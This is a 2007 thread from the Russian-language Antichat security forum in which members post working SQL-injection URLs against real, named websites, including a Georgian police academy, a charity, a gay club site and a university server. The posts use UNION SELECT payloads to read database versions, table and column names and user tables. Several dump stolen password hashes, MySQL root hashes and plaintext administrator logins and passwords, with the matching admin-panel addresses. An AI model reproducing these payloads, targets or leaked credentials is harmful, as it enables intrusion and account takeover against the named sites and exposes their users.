HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 28.12.2007, 02:12
Ded MustD!e
Members of Antichat - Level 5
Регистрация: 23.08.2007
Сообщений: 417
Провел на форуме:
14324684

Репутация: 3908
По умолчанию

http://moscowtoday.info/

Код:
http://moscowtoday.info/news.php?ID=-1'+union+select+concat_ws(0x3a,user(),database(),version())/*
вывод данных в тайтле...
 
Ответить с цитированием

  #2  
Старый 28.12.2007, 07:10
K1nD[e]R
Участник форума
Регистрация: 16.06.2007
Сообщений: 133
Провел на форуме:
1877761

Репутация: 237
По умолчанию

Код:
http://www.myvideo.ge/cams/goLive.php?act=View&st_u_id=-24969+union+select+1,2,3,concat_ws(0x2F,user_id,user_name,user_password),version(),6,7,8+from+video_users/*
Version 5.0.22-log

user_name Password

Guro f5d1278e8109edd94e1e4197e04873b9
achiko 202cb962ac59075b964b07152d234b70
 
Ответить с цитированием

  #3  
Старый 28.12.2007, 13:22
fRg
Участник форума
Регистрация: 28.12.2006
Сообщений: 111
Провел на форуме:
500695

Репутация: 524
По умолчанию

Год моей регистрации!

hcch.net
Код:
http://www.hcch.net/index_en.php?act=conventions.text&cid=-1+union+select+aes_decrypt(aes_encrypt(concat_ws(0x3a,version(),database(),user()),0x71),0x71),2,3,4/*
4.1.11-Debian_4sarge7-log:hcch:hcch@localhost

[ Логин : MySQL(pass) ] :
Код:
root : 066bc62049564980
group.ge
Код:
http://www.group.ge/series.php?id_pro=-1+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3a,version(),database(),user()),11,12,13/*
5.0.22:grp:grp@localhost

PoliceAcademy.ge - Академия МВД Грузии
Код:
http://www.policeacademy.ge/news.php?id=-1+union+select+1,2,3,4,concat_ws(0x3a,version(),database(),user()),6,7,8,9,10,11,12,13,14,15,16/*
5.0.22:academy:cube@localhost

Таблица authentification:
Код:
id,username,password,survey_user,survey_pass,live_user,live_pass,level
admin:studio0386

Таблица _forum_members :
Код:
id,name,mgroup,legacy_password,email,joined,ip_address,posts,title,allow_admin_mails,
time_offset,hide_email,email_pm,email_full,skin,warn_level,warn_lastwarn,language,
last_post,restrict_post,view_sigs,view_img,view_avs,view_pop,bday_day,bday_month,
bday_year,new_msg,msg_total,show_popup,misc,last_visit,last_activity,dst_in_use,
view_prefs,coppa_user,mod_posts,auto_track,temp_ban,sub_end,login_anonymous,
ignored_users,mgroup_others,org_perm_id,member_login_key,subs_pkg_chosen,has_blog,
members_markers,members_editor_choice,members_auto_dst,members_display_name,
members_created_remote,members_cache,members_disable_pm
Есть таблица _forum_moderators

Последний раз редактировалось fRg; 28.12.2007 в 15:10..
 
Ответить с цитированием

  #4  
Старый 28.12.2007, 15:25
Ded MustD!e
Members of Antichat - Level 5
Регистрация: 23.08.2007
Сообщений: 417
Провел на форуме:
14324684

Репутация: 3908
По умолчанию

http://www.blagotvori.com

Код:
http://www.blagotvori.com/programs.php?pid=-1+union+select+1,2,3,4,5,6,concat_ws(0x3a,login,passwd),8,9,10,11,12+from+admin/*
Админка:
http://www.blagotvori.com/admin/

login: nat_nadegdina
pass: nAtt756V12r

Последний раз редактировалось Ded MustD!e; 28.12.2007 в 15:40..
 
Ответить с цитированием

  #5  
Старый 28.12.2007, 15:39
it's my
Banned
Регистрация: 29.09.2007
Сообщений: 512
Провел на форуме:
4038468

Репутация: 1224


По умолчанию

www.uprava.org - Сайт журнала посвященного вопросам местного самоуправления в России.
Код:
http://www.uprava.org/section.php?id=34+union+select+0,1,2,3,4,5,concat_ws(0x2F,user())--
www.gaycentral.ru - Сайт Гей-Клуба "Три Обезьяны"
Код:
http://www.gaycentral.ru/news/?id=99999999+union+select+0,null,concat_ws(0x2F,user(),version()),2,3,null,null,null,4,null,5--

Последний раз редактировалось it's my; 28.12.2007 в 16:17..
 
Ответить с цитированием

  #6  
Старый 28.12.2007, 17:26
AkyHa_MaTaTa
Постоянный
Регистрация: 19.03.2007
Сообщений: 684
Провел на форуме:
3152874

Репутация: 1020


По умолчанию

Первый эду который гугл выдает на "You have an error in your SQL syntax"(вывод в титле):
http://ipr1.hsc.usc.edu/php/wwwthreads5.4/showflat.php?Cat=-1'%20union%20select%20+concat(U_Name,char(59),U_Pa ssword)+FROM+w3t_Users+LIMIT%202,1/*
 
Ответить с цитированием

  #7  
Старый 28.12.2007, 17:41
.Begemot.
Участник форума
Регистрация: 27.03.2007
Сообщений: 161
Провел на форуме:
1273248

Репутация: 785
По умолчанию

kinopano.ru

Код HTML:
http://www.kinopano.ru/index.php?action=movie&sub=trailer&id=540+union+select+0,1,2,3,4,5,6,7,8,9,10/*
Код HTML:
http://www.kinopano.ru/index.php?action=movie&sub=trailer&id=540+union+select+0,1,2,3,concat(USER(),0x3a,VERSION(),0x3a,DATABASE()),5,6,7,8,9,10/*
USER:u24822@10.10.10.226
VERSION:5.0.45-log
DATABASE:u24822

Вывод названий всех таблиц -
Код HTML:
http://www.kinopano.ru/index.php?action=movie&sub=trailer&id=540+union+select+0,1,2,3,table_name,5,6,7,8,9,10+from+information_schema.tables/*
Вывод названий всех колонн -
Код HTML:
http://www.kinopano.ru/index.php?action=movie&sub=trailer&id=540+union+select+0,1,2,3,column_name,5,6,7,8,9,10+from+information_schema.columns/*
Вывод id,name,passwd из таблици kino_users -
Код HTML:
http://www.kinopano.ru/index.php?action=movie&sub=trailer&id=540+union+select+0,1,2,3,concat(id,0x3a,name,0x3a,passwd),5,6,7,8,9,10+from+kino_users/*
Админка -
Код HTML:
http://www.kinopano.ru/admin/

Последний раз редактировалось trumps; 28.12.2007 в 17:45..
 
Ответить с цитированием

  #8  
Старый 28.12.2007, 17:51
v1ru$
Постоянный
Регистрация: 17.03.2007
Сообщений: 336
Провел на форуме:
3766085

Репутация: 576
По умолчанию

Код:
http://www.green-bay.tv/e_commitem.php?id=-31+union+select+1,2,3,4,concat(username,0x3a,password),6,7,8,9,10,11,12,13+from+users/*
gbadmin:Rhondda
 
Ответить с цитированием

  #9  
Старый 28.12.2007, 18:58
Ded MustD!e
Members of Antichat - Level 5
Регистрация: 23.08.2007
Сообщений: 417
Провел на форуме:
14324684

Репутация: 3908
По умолчанию

http://www.awdf.org/

Код:
http://www.awdf.org/pages/?pid=2&sid=-1+union+select+concat_ws(0x3a,user,password),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+mysql.user/*
root:59b5b2b07b506bfa

Версия мускула пятая, так что можно перебирать все таблицы, у меня почему-то сайт начинает глючить при переборе....

Код:
http://www.awdf.org/pages/?pid=2&sid=-1+union+select+table_name,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+information_schema.tables+limit+0,1/*
http://www.akulovagora.ru/

Код:
http://www.akulovagora.ru/page.php?pid=-1'+union+select+1,2,concat_ws(0x3a,user(),version(),database()),4,5,6/*
 
Ответить с цитированием

  #10  
Старый 28.12.2007, 19:04
Loker
Познающий
Регистрация: 25.10.2007
Сообщений: 69
Провел на форуме:
348179

Репутация: 52
По умолчанию

Фото студия))

http://www.2dstudio.ru/photo.php?id=-850+union+select+1,2,Version(),4/*

А вот еще их админка
http://www.2dstudio.ru/admin/

Последний раз редактировалось Loker; 28.12.2007 в 19:12..
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.